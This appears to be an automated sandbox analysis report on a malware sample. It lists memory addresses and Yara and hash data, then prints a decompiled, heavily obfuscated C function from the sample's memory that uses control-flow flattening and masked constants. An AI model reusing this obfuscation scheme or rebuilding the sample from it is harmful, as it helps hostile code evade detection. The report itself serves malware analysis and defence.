                                          0x006cad88
                                          0x006cad8d
                                          0x00000000
                                          0x006cacfd
                                          0x006cacfd
                                          0x006cad03
                                          0x00000000
                                          0x006cad09
                                          0x006cad10
                                          0x006cad26
                                          0x006cad2e
                                          0x006cad64
                                          0x006cad69
                                          0x006cad6e
                                          0x006cad76
                                          0x00000000
                                          0x006cad76
                                          0x006cad03
                                          0x006cacf7
                                          0x006caac2
                                          0x006caac2
                                          0x006cacac
                                          0x006cacbb
                                          0x006cacc2
                                          0x006cacc9
                                          0x006cacd1
                                          0x006cacd2
                                          0x006cacda
                                          0x00000000
                                          0x006caac8
                                          0x006caace
                                          0x006cac86
                                          0x006cac8d
                                          0x00000000
                                          0x006caad4
                                          0x006caada
                                          0x006cac01
                                          0x006cac02
                                          0x006cac0b
                                          0x006cac0d
                                          0x006cac29
                                          0x006cac2d
                                          0x006cac2f
                                          0x006cac4c
                                          0x006cac51
                                          0x006cac54
                                          0x006cac58
                                          0x006cac5a
                                          0x006cb013
                                          0x006cb014
                                          0x006cb01b
                                          0x006cb022
                                          0x006cb041
                                          0x006cb041
                                          0x006cac60
                                          0x006cac60
                                          0x006caa9d
                                          0x006caa9d
                                          0x006caa9d
                                          0x00000000
                                          0x006caa9d
                                          0x006caa9d
                                          0x006cac5a
                                          0x006caae0
                                          0x006caae6
                                          0x006cabcb
                                          0x006cabcf
                                          0x006cabd2
                                          0x006cabd7
                                          0x006cabde
                                          0x006cabde
                                          0x00000000
                                          0x006caaec
                                          0x006caaec
                                          0x006caaf2
                                          0x006cb006
                                          0x006cb006
                                          0x006cb00c
                                          0x006cabe2
                                          0x006cabe2
                                          0x00000000
                                          0x006cabe2
                                          0x006caaf8
                                          0x006caaf8
                                          0x006cab0b
                                          0x006cab12
                                          0x006cab3b
                                          0x006cab4e
                                          0x006cab6c
                                          0x006cab71
                                          0x006cab85
                                          0x006cab8a
                                          0x006cab91
                                          0x006cab98
                                          0x006cab9c
                                          0x006caba0
                                          0x006caaa1
                                          0x006caaa4
                                          0x006caaa4
                                          0x006caaaa
                                          0x00000000
                                          0x00000000
                                          0x006caaaa
                                          0x006caaf2
                                          0x006caae6
                                          0x006caada
                                          0x006caace
                                          0x006caac2
                                          0x006caabc
                                          0x006cb04a
                                          0x006cb054
                                          0x006cae42
                                          0x006cae42
                                          0x006cae48
                                          0x006cafef
                                          0x006caff1
                                          0x006cb001
                                          0x00000000
                                          0x006caff3
                                          0x006caff3
                                          0x00000000
                                          0x006caff3
                                          0x006cae4e
                                          0x006cae4e
                                          0x006cae54
                                          0x006caf59
                                          0x006caf64
                                          0x006caf69
                                          0x006caf69
                                          0x006caf6a
                                          0x006caf94
                                          0x006caf9b
                                          0x006cafa0
                                          0x006cafa3
                                          0x006cafa8
                                          0x006cafa9
                                          0x006cafac
                                          0x006cafaf
                                          0x006cafaf
                                          0x006cafaf
                                          0x006cafb2
                                          0x006cafbb
                                          0x006cafbe
                                          0x006cafc7
                                          0x00000000
                                          0x006cae5a
                                          0x006cae5a
                                          0x006cae60
                                          0x006caf41
                                          0x006caf48
                                          0x00000000
                                          0x006cae66
                                          0x006cae66
                                          0x006cae6c
                                          0x006caf1a
                                          0x006caf21
                                          0x00000000
                                          0x006cae72
                                          0x006cae72
                                          0x006cae78
                                          0x006caef6
                                          0x006caefd
                                          0x00000000
                                          0x006cae7a
                                          0x006cae7a
                                          0x006cae80
                                          0x006cb02b
                                          0x006cb02c
                                          0x006cb033
                                          0x006cb03a
                                          0x00000000
                                          0x006cae86
                                          0x006cae86
                                          0x006cae8c
                                          0x00000000
                                          0x006cae92
                                          0x006caeb5
                                          0x006caebd
                                          0x006caec2
                                          0x006caec7
                                          0x006caecf
                                          0x00000000
                                          0x006caecf
                                          0x006cae8c
                                          0x006cae80
                                          0x006cae78
                                          0x006cae6c
                                          0x006cae60
                                          0x006cae54
                                          0x00000000
                                          0x006cae48
                                          0x006caaa4
                                          0x006caaa1

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
                                          • API String ID: 0-3061497230
                                          • Opcode ID: 616817d18bb11978b28ed6f3587a58edc1c0e74bb538bcf7a6769ee7c5303f1d
                                          • Instruction ID: 1398b3b8554bf87ac37234fd396396e4e8d92044715ac4fb606818e01fa71e33
                                          • Opcode Fuzzy Hash: 616817d18bb11978b28ed6f3587a58edc1c0e74bb538bcf7a6769ee7c5303f1d
                                          • Instruction Fuzzy Hash: CE82157150C3858BE378CF65C549BABBBE2FBC4318F10891DE19A86260DBB59949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CC769, Relevance: 24.4, Strings: 19, Instructions: 630COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E006CC769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				char _v320;
				intOrPtr _t666;
				intOrPtr _t667;
				intOrPtr _t672;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t687;
				intOrPtr _t689;
				intOrPtr _t693;
				intOrPtr* _t694;
				signed int _t706;
				intOrPtr _t707;
				void* _t712;
				intOrPtr _t718;
				void* _t758;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr _t785;
				signed int _t786;
				intOrPtr _t788;
				char _t793;
				void* _t795;
				void* _t797;

				_t694 = __edx;
				_push(_a40);
				_push(_a36);
				_v20 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_a20 & 0x0000ffff);
				_v12 = 0x78501c;
				_v24 = 0;
				_v8 = 0;
				_t793 = 0;
				_v4 = 0;
				_t795 =  &_v320 + 0x30;
				_v232 = 0x7906;
				_t786 = 0xcd25e5e;
				_v232 = _v232 << 6;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 ^ 0x00000790;
				_v156 = 0xf83b;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 ^ 0x0000000c;
				_v52 = 0x2ceb;
				_v52 = _v52 | 0xa5610ac4;
				_v52 = _v52 ^ 0xa5612e27;
				_v208 = 0x96db;
				_v208 = _v208 + 0xffffce2c;
				_v208 = _v208 | 0x71346f29;
				_v208 = _v208 ^ 0x7134ef2f;
				_v116 = 0x28a4;
				_v116 = _v116 + 0xffff342e;
				_v116 = _v116 ^ 0xffff1cd2;
				_v124 = 0xa3bc;
				_v124 = _v124 + 0xffffb3e2;
				_v124 = _v124 ^ 0x0040579e;
				_v132 = 0x4a92;
				_v132 = _v132 << 0xb;
				_v132 = _v132 ^ 0x02509000;
				_v140 = 0xcc93;
				_v140 = _v140 >> 0xd;
				_v140 = _v140 ^ 0x04000006;
				_v148 = 0xadf6;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x0008056f;
				_v216 = 0xcf16;
				_v216 = _v216 ^ 0x2caffd24;
				_v216 = _v216 >> 8;
				_v216 = _v216 ^ 0x002cad32;
				_v296 = 0xe55e;
				_v296 = _v296 << 0x10;
				_v296 = _v296 + 0xffff79ea;
				_v296 = _v296 << 5;
				_v296 = _v296 ^ 0xabaf3c40;
				_v152 = 0xf9a;
				_v16 = 0;
				_v320 = 0;
				_v152 = _v152 * 0x3f;
				_v152 = _v152 ^ 0x8003d6e6;
				_v120 = 0x15;
				_v120 = _v120 << 2;
				_v120 = _v120 ^ 0x00000054;
				_v144 = 0x2eae;
				_v144 = _v144 + 0x3c19;
				_v144 = _v144 ^ 0x00006ac4;
				_v56 = 0xab01;
				_t773 = 0x5e;
				_v56 = _v56 / _t773;
				_v56 = _v56 ^ 0x00004cb8;
				_v104 = 0x2a8e;
				_t774 = 0x2c;
				_v104 = _v104 / _t774;
				_v104 = _v104 ^ 0x000033ed;
				_v292 = 0xd22b;
				_v292 = _v292 | 0xd3babaa8;
				_t775 = 0x50;
				_v292 = _v292 * 0x6c;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x00a58d92;
				_v96 = 0x39fa;
				_v96 = _v96 / _t775;
				_v96 = _v96 ^ 0x00002d01;
				_v240 = 0xf5d4;
				_v240 = _v240 ^ 0x5b9fa071;
				_v240 = _v240 >> 3;
				_v240 = _v240 ^ 0x0b73efef;
				_v248 = 0x1311;
				_t776 = 0x42;
				_v248 = _v248 / _t776;
				_v248 = _v248 + 0x5e6d;
				_v248 = _v248 ^ 0x00004acc;
				_v88 = 0x907;
				_t777 = 0x6e;
				_v88 = _v88 * 0x48;
				_v88 = _v88 ^ 0x0002ff0c;
				_v36 = 0x8ec2;
				_v36 = _v36 / _t777;
				_v36 = _v36 ^ 0x00005772;
				_v260 = 0x4792;
				_v260 = _v260 << 0xd;
				_v260 = _v260 >> 0xb;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x00006a86;
				_v224 = 0x4f89;
				_v224 = _v224 + 0xffff3059;
				_t778 = 0x21;
				_v224 = _v224 * 0x6e;
				_v224 = _v224 ^ 0xffc8e4d3;
				_v48 = 0x8858;
				_v48 = _v48 + 0x804a;
				_v48 = _v48 ^ 0x00017e21;
				_v312 = 0xd58c;
				_v312 = _v312 | 0x45747a0f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 / _t778;
				_v312 = _v312 ^ 0x00008646;
				_v300 = 0xadcd;
				_v300 = _v300 >> 8;
				_v300 = _v300 << 9;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x00008fc4;
				_v268 = 0xd742;
				_t779 = 0x30;
				_v268 = _v268 / _t779;
				_v268 = _v268 + 0x61d9;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x00000191;
				_v204 = 0x8d76;
				_v204 = _v204 | 0x1111a955;
				_v204 = _v204 << 5;
				_v204 = _v204 ^ 0x2235a282;
				_v64 = 0x8939;
				_v64 = _v64 + 0xffff3fc4;
				_v64 = _v64 ^ 0xffff80c7;
				_v276 = 0x72;
				_v276 = _v276 * 0x7d;
				_v276 = _v276 + 0xffff8366;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x007facee;
				_v44 = 0xf34a;
				_v44 = _v44 + 0xffffbf38;
				_v44 = _v44 ^ 0x00008263;
				_v112 = 0x1dc0;
				_v112 = _v112 ^ 0x2c6551d7;
				_v112 = _v112 ^ 0x2c653ad3;
				_v228 = 0xc596;
				_v228 = _v228 ^ 0x9ca21630;
				_v228 = _v228 ^ 0x8f0fd5bf;
				_v228 = _v228 ^ 0x13ad7fff;
				_v196 = 0x8cfa;
				_v196 = _v196 >> 1;
				_v196 = _v196 ^ 0xfb4b109c;
				_v196 = _v196 ^ 0xfb4b1bca;
				_v236 = 0x2fd6;
				_v236 = _v236 << 7;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x005fedce;
				_v180 = 0x51a5;
				_v180 = _v180 ^ 0x4af0041f;
				_v180 = _v180 + 0xfffff3cf;
				_v180 = _v180 ^ 0x4af05e30;
				_v244 = 0x8950;
				_v244 = _v244 << 0xc;
				_v244 = _v244 | 0xbaabdb8a;
				_v244 = _v244 ^ 0xbabf869d;
				_v40 = 0xc836;
				_v40 = _v40 + 0xffff3474;
				_v40 = _v40 ^ 0xffff8af1;
				_v176 = 0x9727;
				_v176 = _v176 + 0xffffb8fc;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x00001e80;
				_v304 = 0x64c7;
				_v304 = _v304 + 0x56f7;
				_v304 = _v304 ^ 0x2de137fe;
				_v304 = _v304 + 0xaf99;
				_v304 = _v304 ^ 0x2de22ef8;
				_v308 = 0x2e06;
				_v308 = _v308 | 0x78777a1f;
				_v308 = _v308 * 0x79;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x1e0f1828;
				_v92 = 0xc9a2;
				_v92 = _v92 | 0xf3c29ea2;
				_v92 = _v92 ^ 0xf3c28d84;
				_v100 = 0xecbf;
				_v100 = _v100 + 0xffff0faf;
				_v100 = _v100 ^ 0xffffc0a5;
				_v192 = 0x95e0;
				_v192 = _v192 << 8;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x2bc00f3b;
				_v200 = 0x7c40;
				_t780 = 0x3a;
				_v200 = _v200 / _t780;
				_v200 = _v200 << 8;
				_v200 = _v200 ^ 0x000244df;
				_v272 = 0x7605;
				_v272 = _v272 << 5;
				_v272 = _v272 + 0xffffdeaf;
				_v272 = _v272 >> 0xb;
				_v272 = _v272 ^ 0x00001482;
				_v108 = 0x1c78;
				_v108 = _v108 + 0x3c33;
				_v108 = _v108 ^ 0x00006c40;
				_v280 = 0xd61a;
				_v280 = _v280 ^ 0xfb8fe6a7;
				_v280 = _v280 + 0x5fc;
				_v280 = _v280 | 0xbad3e440;
				_v280 = _v280 ^ 0xfbdf8156;
				_v288 = 0x89a2;
				_v288 = _v288 + 0xffff4641;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 >> 0xd;
				_v288 = _v288 ^ 0x000071e8;
				_v252 = 0xe21c;
				_v252 = _v252 ^ 0x457ecc8f;
				_t781 = 0x67;
				_v252 = _v252 * 0x59;
				_v252 = _v252 ^ 0x28de7ded;
				_v84 = 0xe1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x00001e3a;
				_v184 = 0xbeeb;
				_v184 = _v184 * 0x12;
				_v184 = _v184 + 0x8ae1;
				_v184 = _v184 ^ 0x000de1ad;
				_v68 = 0xfd10;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000036f7;
				_v76 = 0x1f03;
				_v76 = _v76 * 0x49;
				_v76 = _v76 ^ 0x000897f9;
				_v264 = 0xf0d9;
				_v264 = _v264 * 0x66;
				_v264 = _v264 + 0xffffb5cf;
				_v264 = _v264 + 0xea22;
				_v264 = _v264 ^ 0x0060dcb6;
				_v168 = 0xdfa9;
				_v168 = _v168 ^ 0x7c3d7298;
				_v168 = _v168 ^ 0xd2777362;
				_v168 = _v168 ^ 0xae4ad343;
				_v72 = 0x8534;
				_v72 = _v72 ^ 0x085524ca;
				_v72 = _v72 ^ 0x085595c2;
				_v136 = 0x90f3;
				_v136 = _v136 + 0xcfad;
				_v136 = _v136 ^ 0x00017ab2;
				_v220 = 0x7eee;
				_v220 = _v220 >> 3;
				_v220 = _v220 + 0xffffea23;
				_v220 = _v220 ^ 0xffffcf89;
				_v164 = 0x31cc;
				_v164 = _v164 | 0x82d13576;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x105a14dc;
				_v284 = 0xab9f;
				_v284 = _v284 / _t781;
				_v284 = _v284 + 0xffff982b;
				_v284 = _v284 + 0xcf45;
				_v284 = _v284 ^ 0x000072b9;
				_v80 = 0x4458;
				_v80 = _v80 + 0xfa7e;
				_v80 = _v80 ^ 0x000168e1;
				_v128 = 0x89b9;
				_v128 = _v128 + 0xe32e;
				_v128 = _v128 ^ 0x00010bac;
				_v172 = 0xe617;
				_v172 = _v172 << 4;
				_v172 = _v172 + 0xb499;
				_v172 = _v172 ^ 0x000f5cd6;
				_v212 = 0x2b1d;
				_v212 = _v212 << 0x10;
				_t782 = 0x21;
				_v212 = _v212 * 0x7f;
				_v212 = _v212 ^ 0x63636a51;
				_v188 = 0x87b6;
				_v188 = _v188 | 0xa87ad713;
				_v188 = _v188 << 3;
				_v188 = _v188 ^ 0x43d6c05c;
				_v60 = 0x1ec0;
				_v60 = _v60 / _t782;
				_v60 = _v60 ^ 0x000042c8;
				_v256 = 0x1798;
				_v256 = _v256 ^ 0x8091dd24;
				_v256 = _v256 | 0xdc47dedf;
				_t783 = 0x19;
				_v256 = _v256 * 0x5d;
				_v256 = _v256 ^ 0x3a6c6c2e;
				_v160 = 0x6f3f;
				_v160 = _v160 / _t783;
				_t784 = 0x73;
				_t785 = _v20;
				_v160 = _v160 / _t784;
				_v160 = _v160 ^ 0x00005ad1;
				while(1) {
					L1:
					_t758 = 0x1fbed331;
					while(1) {
						_t797 = _t786 - _t758;
						if(_t797 <= 0) {
						}
						L3:
						if(_t797 == 0) {
							__eflags = E006C5B79(_t785, _v20);
							_t786 = 0x1b724d6a;
							_t679 = 1;
							_t793 =  !=  ? _t679 : _t793;
							L13:
							_t666 = _v316;
							L14:
							_t707 = _v320;
							goto L1;
						}
						if(_t786 == 0xa0d70be) {
							__eflags = _t694;
							if(_t694 == 0) {
								_t718 = 0;
								__eflags = 0;
							} else {
								_t718 =  *_t694;
							}
							__eflags = _t694;
							if(_t694 == 0) {
								_t680 = 0;
								__eflags = 0;
							} else {
								_t680 =  *((intOrPtr*)(_t694 + 4));
							}
							E006D8422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
							_t795 = _t795 + 0x1c;
							asm("sbb esi, esi");
							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
							goto L13;
						}
						if(_t786 == 0xcd25e5e) {
							_t786 = 0x25fbc0d1;
							while(1) {
								_t797 = _t786 - _t758;
								if(_t797 <= 0) {
								}
								goto L25;
							}
							goto L3;
						}
						if(_t786 == 0xdfc12f5) {
							_t666 = E006D7955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
							_t795 = _t795 + 0x34;
							_v316 = _t666;
							__eflags = _t666;
							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
							goto L14;
						}
						if(_t786 == 0x1b724d6a) {
							E006C7925(_v284, _t785, _v80, _v128);
							_t786 = 0x2cd2473d;
							L12:
							goto L13;
						}
						if(_t786 != 0x1e7ff602) {
							L45:
							__eflags = _t786 - 0x258a7eda;
							if(_t786 == 0x258a7eda) {
								L10:
								return _t793;
							}
							_t666 = _v316;
							continue;
						}
						E006C7925(_v60, _v32, _v256, _v160);
						goto L10;
						L25:
						__eflags = _t786 - 0x20246154;
						if(_t786 == 0x20246154) {
							__eflags = _t694;
							if(__eflags == 0) {
								_t787 = _v16;
							} else {
								_push(_v308);
								_t667 = E006D889D(0x6dc850, _v304, __eflags);
								_t787 = _t667;
								_v16 = _t667;
							}
							_t785 = E006C1BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
							_t706 = _v252;
							E006D2025(_t706, _t787, _v84, _v184);
							_t795 = _t795 + 0x40;
							__eflags = _t785;
							if(_t785 == 0) {
								_t786 = 0x2cd2473d;
								L44:
								_t707 = _v320;
								_t758 = 0x1fbed331;
								goto L45;
							}
							_push(_t706);
							_v28 = 1;
							_t693 = E006D6AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
							_t795 = _t795 + 0x18;
							_v28 = _t693;
							_t786 = 0xa0d70be;
							goto L13;
						}
						__eflags = _t786 - 0x25fbc0d1;
						if(_t786 == 0x25fbc0d1) {
							_push(0x200);
							_v24 = 0x200;
							_t788 = E006C8736(0x200);
							_t712 = 0x200;
							__eflags = _t788;
							if(_t788 != 0) {
								_t687 = E006CF74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
								_t795 = _t795 + 0x10;
								__eflags = _t687;
								if(_t687 == 0) {
									_t689 = E006D0F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
									_t795 = _t795 + 0x14;
									_v320 = _t689;
								}
								E006CF536(_v224, _v48, _v312, _t788);
							}
							_t786 = 0x276816a4;
							goto L13;
						}
						__eflags = _t786 - 0x276816a4;
						if(_t786 == 0x276816a4) {
							_push(_t707);
							_t672 = E006C5A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
							__eflags = _t672;
							_v32 = _t672;
							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
							E006CF536(_v276, _v44, _v112, _v320);
							_t795 = _t795 + 0x24;
							goto L44;
						}
						__eflags = _t786 - 0x2cd2473d;
						if(_t786 == 0x2cd2473d) {
							E006C7925(_v172, _t666, _v212, _v188);
							_t786 = 0x1e7ff602;
							goto L12;
						}
						__eflags = _t786 - 0x33e5fd12;
						if(__eflags != 0) {
							goto L45;
						}
						__eflags = E006D687F(_t785, _v156, __eflags) - _v52;
						_t758 = 0x1fbed331;
						_t666 = _v316;
						_t707 = _v320;
						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
					}
				}
			}



















































































































                                          0x006cc777
                                          0x006cc77c
                                          0x006cc786
                                          0x006cc78d
                                          0x006cc794
                                          0x006cc79b
                                          0x006cc7a2
                                          0x006cc7a9
                                          0x006cc7aa
                                          0x006cc7b1
                                          0x006cc7b8
                                          0x006cc7bf
                                          0x006cc7c6
                                          0x006cc7c7
                                          0x006cc7c8
                                          0x006cc7cd
                                          0x006cc7da
                                          0x006cc7e3
                                          0x006cc7ea
                                          0x006cc7ec
                                          0x006cc7f3
                                          0x006cc7f6
                                          0x006cc7fe
                                          0x006cc803
                                          0x006cc808
                                          0x006cc80d
                                          0x006cc815
                                          0x006cc820
                                          0x006cc828
                                          0x006cc830
                                          0x006cc83b
                                          0x006cc846
                                          0x006cc851
                                          0x006cc85c
                                          0x006cc867
                                          0x006cc872
                                          0x006cc87d
                                          0x006cc888
                                          0x006cc893
                                          0x006cc89e
                                          0x006cc8a9
                                          0x006cc8b4
                                          0x006cc8bf
                                          0x006cc8ca
                                          0x006cc8d2
                                          0x006cc8dd
                                          0x006cc8e8
                                          0x006cc8f0
                                          0x006cc8fb
                                          0x006cc906
                                          0x006cc90e
                                          0x006cc919
                                          0x006cc921
                                          0x006cc929
                                          0x006cc92e
                                          0x006cc936
                                          0x006cc93e
                                          0x006cc943
                                          0x006cc94b
                                          0x006cc950
                                          0x006cc958
                                          0x006cc963
                                          0x006cc972
                                          0x006cc976
                                          0x006cc97d
                                          0x006cc988
                                          0x006cc993
                                          0x006cc99b
                                          0x006cc9a3
                                          0x006cc9ae
                                          0x006cc9b9
                                          0x006cc9c4
                                          0x006cc9da
                                          0x006cc9df
                                          0x006cc9e8
                                          0x006cc9f3
                                          0x006cca05
                                          0x006cca0a
                                          0x006cca13
                                          0x006cca1e
                                          0x006cca26
                                          0x006cca33
                                          0x006cca36
                                          0x006cca3a
                                          0x006cca3f
                                          0x006cca47
                                          0x006cca5d
                                          0x006cca64
                                          0x006cca6f
                                          0x006cca77
                                          0x006cca7f
                                          0x006cca84
                                          0x006cca8c
                                          0x006cca98
                                          0x006cca9d
                                          0x006ccaa3
                                          0x006ccaab
                                          0x006ccab3
                                          0x006ccac6
                                          0x006ccac9
                                          0x006ccad0
                                          0x006ccadb
                                          0x006ccaf1
                                          0x006ccaf8
                                          0x006ccb03
                                          0x006ccb0b
                                          0x006ccb10
                                          0x006ccb15
                                          0x006ccb1a
                                          0x006ccb22
                                          0x006ccb2a
                                          0x006ccb37
                                          0x006ccb38
                                          0x006ccb3c
                                          0x006ccb44
                                          0x006ccb4f
                                          0x006ccb5a
                                          0x006ccb65
                                          0x006ccb6d
                                          0x006ccb75
                                          0x006ccb80
                                          0x006ccb84
                                          0x006ccb8c
                                          0x006ccb94
                                          0x006ccb99
                                          0x006ccb9e
                                          0x006ccba2
                                          0x006ccbac
                                          0x006ccbba
                                          0x006ccbbd
                                          0x006ccbc1
                                          0x006ccbc9
                                          0x006ccbce
                                          0x006ccbd6
                                          0x006ccbe1
                                          0x006ccbec
                                          0x006ccbf4
                                          0x006ccbff
                                          0x006ccc0a
                                          0x006ccc15
                                          0x006ccc20
                                          0x006ccc2d
                                          0x006ccc31
                                          0x006ccc39
                                          0x006ccc3e
                                          0x006ccc46
                                          0x006ccc51
                                          0x006ccc5c
                                          0x006ccc67
                                          0x006ccc72
                                          0x006ccc7d
                                          0x006ccc88
                                          0x006ccc90
                                          0x006ccc98
                                          0x006ccca0
                                          0x006ccca8
                                          0x006cccb3
                                          0x006cccba
                                          0x006cccc5
                                          0x006cccd0
                                          0x006cccd8
                                          0x006cccdd
                                          0x006ccce2
                                          0x006cccea
                                          0x006cccf5
                                          0x006ccd00
                                          0x006ccd0b
                                          0x006ccd16
                                          0x006ccd1e
                                          0x006ccd23
                                          0x006ccd2b
                                          0x006ccd33
                                          0x006ccd3e
                                          0x006ccd49
                                          0x006ccd54
                                          0x006ccd5f
                                          0x006ccd6a
                                          0x006ccd72
                                          0x006ccd7d
                                          0x006ccd85
                                          0x006ccd8d
                                          0x006ccd95
                                          0x006ccd9d
                                          0x006ccda5
                                          0x006ccdad
                                          0x006ccdba
                                          0x006ccdbe
                                          0x006ccdc3
                                          0x006ccdcb
                                          0x006ccdd6
                                          0x006ccde1
                                          0x006ccdec
                                          0x006ccdf7
                                          0x006cce02
                                          0x006cce0d
                                          0x006cce18
                                          0x006cce20
                                          0x006cce28
                                          0x006cce35
                                          0x006cce49
                                          0x006cce4e
                                          0x006cce57
                                          0x006cce5f
                                          0x006cce6a
                                          0x006cce72
                                          0x006cce77
                                          0x006cce7f
                                          0x006cce84
                                          0x006cce8c
                                          0x006cce97
                                          0x006ccea2
                                          0x006ccead
                                          0x006cceb5
                                          0x006ccebd
                                          0x006ccec5
                                          0x006ccecd
                                          0x006cced5
                                          0x006ccedd
                                          0x006ccee5
                                          0x006cceea
                                          0x006cceef
                                          0x006ccef7
                                          0x006cceff
                                          0x006ccf0c
                                          0x006ccf0d
                                          0x006ccf11
                                          0x006ccf19
                                          0x006ccf24
                                          0x006ccf2c
                                          0x006ccf37
                                          0x006ccf4a
                                          0x006ccf51
                                          0x006ccf5c
                                          0x006ccf67
                                          0x006ccf72
                                          0x006ccf7a
                                          0x006ccf85
                                          0x006ccf98
                                          0x006ccf9f
                                          0x006ccfaa
                                          0x006ccfb7
                                          0x006ccfbb
                                          0x006ccfc3
                                          0x006ccfcb
                                          0x006ccfd3
                                          0x006ccfde
                                          0x006ccfe9
                                          0x006ccff4
                                          0x006ccfff
                                          0x006cd00a
                                          0x006cd015
                                          0x006cd020
                                          0x006cd02b
                                          0x006cd036
                                          0x006cd041
                                          0x006cd049
                                          0x006cd04e
                                          0x006cd056
                                          0x006cd05e
                                          0x006cd069
                                          0x006cd074
                                          0x006cd07c
                                          0x006cd087
                                          0x006cd095
                                          0x006cd099
                                          0x006cd0a1
                                          0x006cd0a9
                                          0x006cd0b1
                                          0x006cd0bc
                                          0x006cd0c7
                                          0x006cd0d2
                                          0x006cd0df
                                          0x006cd0ea
                                          0x006cd0f5
                                          0x006cd100
                                          0x006cd108
                                          0x006cd113
                                          0x006cd11e
                                          0x006cd126
                                          0x006cd132
                                          0x006cd135
                                          0x006cd13c
                                          0x006cd147
                                          0x006cd152
                                          0x006cd15d
                                          0x006cd165
                                          0x006cd170
                                          0x006cd186
                                          0x006cd18d
                                          0x006cd198
                                          0x006cd1a0
                                          0x006cd1a8
                                          0x006cd1b5
                                          0x006cd1b8
                                          0x006cd1bc
                                          0x006cd1c4
                                          0x006cd1da
                                          0x006cd1e8
                                          0x006cd1eb
                                          0x006cd1f2
                                          0x006cd1f9
                                          0x006cd208
                                          0x006cd208
                                          0x006cd208
                                          0x006cd20d
                                          0x006cd20d
                                          0x006cd20f
                                          0x006cd20f
                                          0x006cd215
                                          0x006cd215
                                          0x006cd386
                                          0x006cd388
                                          0x006cd38f
                                          0x006cd390
                                          0x006cd29d
                                          0x006cd29d
                                          0x006cd2a1
                                          0x006cd2a1
                                          0x00000000
                                          0x006cd2a1
                                          0x006cd221
                                          0x006cd31f
